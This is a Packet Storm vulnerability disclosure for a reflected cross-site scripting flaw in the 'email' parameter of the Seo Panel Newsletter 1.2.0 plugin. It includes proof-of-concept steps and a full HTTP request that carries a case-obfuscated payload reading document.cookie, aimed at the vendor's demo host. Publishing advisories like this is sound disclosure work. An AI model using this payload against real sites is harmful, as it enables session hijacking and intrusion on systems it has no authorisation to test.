Seo Panel Newsletter 1.2.0 Cross Site Scripting

2019-04-15T00:00:00
ID PACKETSTORM:152529
Type packetstorm
Reporter Deyaa Muhammad
Modified 2019-04-15T00:00:00

Description

                                        
                                            `# Exploit Title: Seo Panel Plugin Newsletter 1.2.0 - 'plugins/newsletter/unsubscribemaillist.php email' Cross-site Scripting  
# Google Dork: N/A  
# Date: 15 April 2019  
# Exploit Author: Deyaa Muhammad  
# Author EMail: contact [at] deyaa.me  
# Author Blog: http://deyaa.me  
# Vendor Homepage: http://sp.seopanel.in/  
# Software Link: https://www.seopanel.in/plugin/d/19/newsletter-plugin/demo/  
# Demo Link: https://www.seopanel.in/plugin/showdemo/19/  
# Version: 1.2.0  
# Tested on: WIN7_x68/Linux  
# CVE : N/A  
  
# Description:  
----------------------  
Seo Panel Plugin Newsletter 1.2.0 suffers from a Cross-site Scripting vulnerability.  
  
# POC:  
----------------------  
1. Access the following path http://[PATH]/plugins/newsletter/unsubscribemaillist.php  
2. Manipulate the parameter "email" with your own XSS payload.  
  
# Request:  
----------------------  
GET /plugins/newsletter/unsubscribemaillist.php?email=<htML/+/ONMOuSeOvEr+=+(confirm)(document.cookie)// HTTP/1.1  
Host: sp.seopanel.in  
Connection: close  
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
  
  
`